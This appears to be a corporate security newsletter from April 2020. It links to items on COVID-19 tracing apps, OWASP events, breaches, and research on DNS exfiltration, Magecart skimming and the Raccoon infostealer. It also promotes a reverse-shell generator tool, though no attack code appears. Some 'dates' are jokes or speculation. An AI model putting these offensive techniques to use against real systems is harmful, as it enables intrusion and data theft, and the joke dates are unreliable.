Security Stack Sheet #92

 

Word of the Week

 “COVID-19 Government Mobile Apps”

Iran, Colombia, and Italy Put Citizens at Risk with COVID-19 Government Mobile Apps

BEWARE OF FAKE APPS! CHECK THE CREATOR & TRUSTED SOURCES THOROUGHLY!

Also Apple and Google Team Up to ‘Contact Trace’ the Coronavirus

Links HERE and HERE and HERE and HERE and HERE and HERE and HERE and working from home? HERE and HERE

“Also worth reading are this EFF essay, and this ACLU white paper.

Susan Landau on contact tracing apps and how they’re being oversold. And Farzad Mostashari, former coordinator for health IT at the Department of Health and Human Services, on contact tracing apps.”

Bruce Schneier’s opinion:

To me, the real problems aren’t around privacy and security. The efficacy of any app-based contact tracing is still unproven. A "contact" from the point of view of an app isn’t the same as an epidemiological contact. And the ratio of infections to contacts is high. We would have to deal with the false positives (being close to someone else, but separated by a partition or other barrier) and the false negatives (not being close to someone else, but contracting the disease through a mutually touched object). And without cheap, fast, and accurate testing, the information from any of these apps isn’t very useful. So I agree with Ross that this is primarily an exercise in that false syllogism: Something must be done. This is something. Therefore, we must do it. It’s techies proposing tech solutions to what is primarily a social problem.

As long as 1) every contact does not result in an infection, and 2) a large percentage of people with the disease are asymptomatic and don’t realize they have it, I can’t see how this sort of app is valuable. If we had cheap, fast, and accurate testing for everyone on demand…maybe. But I still don’t think so.

AND

“Immunity Passports”

Several countries have begun floating the idea of an “immunity passport,” which would certify that someone is immune to COVID-19. Not only does the idea raise a number of security and privacy issues, but there are still unknowns about immunity to this particular virus.
[Neely]
I carry an immunization record with me when traveling internationally, typically a paper form, as well as a digital backup, to be surrendered for examination by border control based on the risk of your origin point, or verification that you meet local mandatory immunization requirements. While COVID-19 changes those factors, the bigger issue is having an internationally recognized indicator of immunity to COVID-19

Links HERE and HERE

 

Bonus

A close up of a logo  Description automatically generated

Link HERE – thread

A picture containing bird  Description automatically generated

Link HERE

 

Crypto challenge of the week

dogcat

I made a website where you can look at pictures of dogs and/or cats!

Link HERE

Hacky Easter Archive

Link HERE

 

Dates

  • May 25th 2018: Almost 2 years of GDPR Live! See incidents section below GDPR Enforce Tracker Link HERE – thanks to Marius
  • 1st January 2020 – The California Consumer Privacy Act (CCPA) becomes effective Link HERE
  • Now: TLS1.2 mandatory for proper security HTTPS everywhere HERE
  • DO NOT DELAY TLS1.2 migration LATER THAN JUNE 2020 or A FEW THINGS WILL STOP WORKING!

[Browsers, Office365, Cisco and many others]

  • January 2020 – Qualys SSLLabs will rate your TLS1.0 setup as B – Qualys will de-grade you HERE DONE
  • June 2020 – Microsoft plans to deprecate TLS versions 1.0 and 1.1 in Office 365 and Office 365 GCC – HERE
  • 31st of December 2020 – Brexit Finalised?
  • 1st of June 2020 – Freedom from viruses

A screenshot of a social media post  Description automatically generated

Link HERE

  • November 3rd 2020: Trump’s second term start
  • 2022 – First trip to Mars according to Elon Musk
  • 2023 – 3DES is deprecated for all new applications and usage is disallowed after 2023 HERE
  • 2024 – Back to the Moon according to Trump and NASA

 

Book of the month

Hakin9 magazine Vol 11 No 8

A screenshot of a cell phone  Description automatically generated

Link HERE

Protecting Your Web Applications

Solutions and Strategies to Combat Cybersecurity Threats

The rise of cloud computing, use of open source technologies, new data-processing requirements, complexity of web applications, and an increase in the overall sophistication of attackers have combined to create an extremely challenging environment for IT security leadership. Given how critical websites, applications, and online services have become to supporting revenue and productivity, there is nothing more important for your business than ensuring that your digital assets are available and protected at all times. Consider the impact of cyberthreats on your business: customer loss, brand reputation damage or permanent loss of revenue, and team culture demise. In this report, we examine the increasing cyberthreat landscape and take a detailed look at the major threat patterns businesses and security professionals currently experience. We explain how attackers have become so successful and offer remedies to prevent attacks and fix existing vulnerabilities. And, finally, we look at current and emerging trends in efforts to move to cloud-based security, out‐ sourced services, and third-party hosting options

Link HERE

 

Comic of the week

 - Dilbert by Scott Adams

 

##Some OWASP stuff first

-How To Start A Career in Application Security

Learn from global experts how to launch your AppSec career. What are the careers in Application Security? What is required for an AppSec career? What are the certifications required? We will discuss, what works for these experts, what they have seen has worked for friends. All areas that can help a fresher make an entry in the Application Security domain or for those who are already in can understand how to grow and mature like a pro!

Link HERE

-Mark Merkow — Secure, Resilient, and Agile Software Development

Mark will discuss how application security and Agile software development methodology fit together

Link HERE

-Remember: OWASP OpenSAMM v2.0

How mature are your software security practices?

SAMM Website

Link HERE, CI/CD SAMM HERE and summit event HERE

-How to Write Insecure Code

The idea for this article comes from Roedy Green’s How to write unmaintainable code. You may find the one page version more readable. Actually, making your code unmaintainable is a great first step towards making it insecure and there are some great ideas in this article, particularly the section on camouflage

Link HERE

 

Events

OWASP events HERE

OWASP Foundation will be holding a Virtual AppSec Days on April 27-29th

Registration will open on MONDAY, April 6

Link HERE

OWASP Newcastle May meetup

This will now be an online only event. The stream will start around 1815.
Link for the steam:
HERE

Link HERE

Isolation Con on Twitch – check below!

Image

Link HERE

Application Security For Developers – Learning Defence by Offense

Join the Webinar: Tuesday 21st April,12:00 – 13:00pm BST

Join Rohit Salecha, Black Hat Trainer, and accredited Pen Tester, from NotSoSecure, discuss as web application vulnerabilities are on the rise, why it’s essential that developers are educated in response to the growing risk

Link HERE

Maintaining Secure Development Practices in a WFH Environment

Thursday, April 23 at 8:00am PDT |11:00am EDT | 16:00 BST

Link HERE

 

Incidents

Global ALERT level

cid:<a href=[email protected]“>

BLUE or GUARDED indicates a general risk of increased hacking, virus, or other malicious activity. The potential exists for malicious cyber activities, but no known exploits have been identified, or known exploits have been identified but no significant impact has occurred. 

A close up of a map  Description automatically generated

Incident data HERE Find your country

A picture containing umbrella  Description automatically generated

NCSC Weekly Threat Report

Provided Image 

Bumper “Patch Tuesday” releases from Microsoft

Amongst the 113 security updates in the April release from Microsoft were patches for 3 zero-day vulnerabilities. This follows a similarly large release of 115 fixes in March

US issues North Korean cyber threat warning

Officials in the United States have issued new guidance on the cyber threat posed by North Korea
The report – jointly published by the US Departments of State, the Treasury, Homeland Security, and the FBI – highlights the threat posed by North Korea and gives advice on how to stay safe online

Hackers claim to hold European energy giant EDP to ransom

Researchers are reporting that cyber attackers have stolen sensitive files belonging to Energias de Portugal (EDP) using the Ragnar Locker ransomware.

In a new web post, hackers claim that they have downloaded more than 10TB of private information. They threaten to release this information if EDP doesn’t pay a ransom of €10 million

Link HERE – Report Vulns to NCSC HERE and Who is Government Security HERE

API Security Issue 79 – 1.4 million doctor records scraped using API

Unprotected APIs have allowed hackers to compile to put on sale a list of 1.4 million of US doctors, and GitLab has published details on the API vulnerability they recently fixed. We also have a recording of a recent API security conference talk, and an announcement of an upcoming training on OAuth and OpenID Connect

Link HERE

 

Incidents & events detail

Zoom Brings in Help to Address Security Issues

Zoom is calling in experts to help it address security and privacy concerns. With millions of people working at home during the COVID-19 epidemic, Zoom’s popularity has ballooned. It has also been subjected to greater scrutiny by both hackers and security experts, who have unearthed a number of security and privacy issues. The company has hired numerous security consultants, many of whom are former privacy and security experts from other high-profile tech companies. (Please note that the WSJ story is behind a paywall.)


[Pescatore]
Zoom’s CEO publicly apologized for “falling short” on security and privacy and Zoom has taken a lot of important steps to improve. But, they aren’t the only video conferencing approach in use and we know attackers are going after them all. SANS is doing a series of webinars on the key elements to making sure all remote work is done as securely as possible that you can access at www.sans.org/webcasts/.
[Neely]
There is a lot of FUD around Zoom, and rather than drop it like a hot potato, consideration needs to be given to implementing it securely and applying fixes as they come out. Before jumping to another solution, careful analysis of the security, user experience, and transition costs need to be performed

Link HERE and Zoombombing HERE

Facebook Wanted NSO Spyware to Monitor Users, NSO CEO Claims

In a court-filed declaration, NSO Group’s CEO says Facebook tried to buy an Apple spying tool in 2017

Link HERE

FBI Releases Guidance on Defending Against VTC Hijacking and Zoom-bombing

Links HERE and HERE

Rush to adopt online learning under COVID-19 exposes schools to cyberattacks

Link HERE

Russian telco Rostelecom hijacks traffic for IT giants, including Google, Amazon and Facebook

Link HERE

Exclusive: Amazon deploys thermal cameras at warehouses to scan for fevers faster

Link HERE

COVID-19’s impact on Tor

We had to let go of 13 great people who helped make Tor available to millions of people around the world. We will move forward with a core team of 22 people, and remain dedicated to continuing our work on Tor Browser and the Tor software ecosystem

Link HERE

OVER 460 VULNERABILITIES RESOLVED IN TENTH BUG BOUNTY CHALLENGE WITH U.S. DEPARTMENT OF DEFENSE

Link HERE

CVE-2020-1027 | Windows Kernel Elevation of Privilege Vulnerability

Link HERE

Google Removes Malicious Chrome Extensions From Web Store

Google has pulled nearly 50 malicious extensions from the Chrome Web Store. These bad apps were pretending to be legitimate cryptocurrency wallet apps, but actually stole cryptowallet keys and other sensitive information.
[Pescatore]
A key element of the world recovering from the COVID-19 virus is testing, and a critical part of making widespread testing work will be cellphone apps used for demonstrating an individual’s testing status and tracing possible contacts if someone is found to be infected. Google and Apple need to really step up the security of apps and extensions that make it through their testing. Longer times for most apps and extensions to come out of the process are worth it now to significantly elevate the trust/safety level of phones for this coming critical use. Google and Apple are already working together on the tracing side of the problem. A joint effort on radically reducing “badware” that gets through their testing regimes should be a key part of that

Link HERE

TikTok users beware: Hackers could swap your videos with their own

Link HERE

Report: Massive Data Leak Exposes US Energy Sector to Cyberattack

Date discovered: 10th March 2020

Date vendors contacted: 16th March and 2nd April 2020

Date of contact attempt with AWS: 18th and 30th March 2020

Date of Response: 8th April 2020

Date of Action: 8th April 2020

Link HERE

PoetRAT Uses Covid-19 Lures To Attack Azerbajian

Link HERE

Over 700 Malicious Typosquatted Libraries Found On RubyGems Repository

Link HERE

 

Research of the week

Featuring – Data Exfiltration over DNS Queries via Morse Code

Surprising, this technique is very old (over 20 years), but it is still very effective nowadays.

Probably, you’ll ask why don’t we just upload the compromised files to a cloud storage or directly transfer them via protocols like HTTP, FTP, SSH, Telnet and so on. In order to do exfiltration over the protocols mentioned above, the target machine must initiate a network connection and that will be easily noticed by any basic firewall or monitoring tool.

DNS Exfiltration does not require an active network connection in order to send data over Internet, so basically, it will bypass (almost!) all basic security tools, unless you have an advanced solution in place that analyses outbound DNS queries

Link HERE

New Stealth Magecart Attack Bypasses Payment Services Using Iframes

PCI compliant payment services hosted within an iframe are not immune from Magecart attacks. Website owners are still responsible for any stolen personally identifiable information (PII) or resulting fines. The PerimeterX research team has uncovered a novel technique for bypassing hosted fields iframe protection, which enables Magecart attackers to skim credit card data while allowing successful payment transactions. This stealthy attack technique gives no indication of compromise to the user or the website admin, enabling the skimming to persist on checkout pages for a long time. The users don’t suspect any malicious activity since the transaction succeeds as expected. In this blog post we examine an active use of this technique that targets websites using the popular payment provider Braintree, a subsidiary of PayPal.

Our research team has been actively tracking Inter, a popular digital skimming toolkit used to launch Magecart attacks. Inter is widely known for being sold as a complete digital skimming kit and its ability to easily adapt to many checkout pages on e-commerce sites

Link HERE

A close up of a sign  Description automatically generated

Interesting stats:

A screenshot of a cell phone  Description automatically generated

AND

A screenshot of a cell phone  Description automatically generated

Link HERE

ANALYZING THE RACCOON STEALER

An infostealer is a type of malware that is focused on gathering sensitive and conditional information from the compromised system. While this information is often related to the user’s credentials, they have also been known to seek out financial data and personal information. The research performed by CyberArk Labs focused on the methods and techniques that a typical infostealer leverages for stealing sensitive user data and information. Additionally, we wanted to better understand what clients (a.k.a. cybercriminals) are able to retrieve with a low price infostealer such as Raccoon

Link HERE

Remember: Setting the Record Straight: containers vs. Zones vs. Jails vs. VMs

I personally love Zones, Jails, and VMs and I think they all have a particular use case. The confusion with containers primarily lies in assuming they fulfill the same use case as the others; which they do not. Containers allow for a flexibility and control that is not possible with Jails, Zones, or VMs. And THAT IS A FEATURE

Link HERE

 

Tool of the week

Shellerator

Simple CLI tool for the generation of bind and reverse shells in multiple languages

Link HERE

Automate Security Testing with ZAP and GitHub Actions

zap-action

Link HERE

Is BGP safe yet? No. – from Cloudflare

Test your ISP

A screenshot of a cell phone  Description automatically generated

Link HERE

 

Other interesting articles 

##Why is ransomware still a thing? One-in-three polled netizens say they would cave to extortion demands

American young adults are easiest marks for criminals, study reckons

Link HERE

 

##The Challenge of Software Liability

Liability for insecure software is already a reality. The question is whether Congress will step in to give it shape and a coherent legal structure. Broadly speaking, Congress could do this in one of two ways. It could create a legal framework for claims brought by private citizens or state attorneys general. Or it could delegate the regulation of software security to an agency like the Federal Trade Commission (FTC)

Link HERE – thanks to TK

 

##And finally, how to devise Strategy Under times of Uncertainty

What makes for a good strategy in highly uncertain business environments? Some executives seek to shape the future with high-stakes bets

A screenshot of a cell phone  Description automatically generated

Link HERE

 

##HACKING, TOOLS and FUN – CHECK BELOW!

AppSec Ezine

Must see

URL: https://blog.isec.pl/xss-fun-with-animated-svg/

Description: XSS fun with animated SVG.

URL: http://adventures.michaelfbryan.com/posts/lastpass/

Description: How I Reverse Engineered the LastPass CLI Tool.

Links HERE and credits to HERE

 

 

Sage

The information contained in this email transmission may constitute confidential information. If you are not the intended recipient, please take notice that reuse of the information is prohibited.

Leave a Reply

Your email address will not be published. Required fields are marked *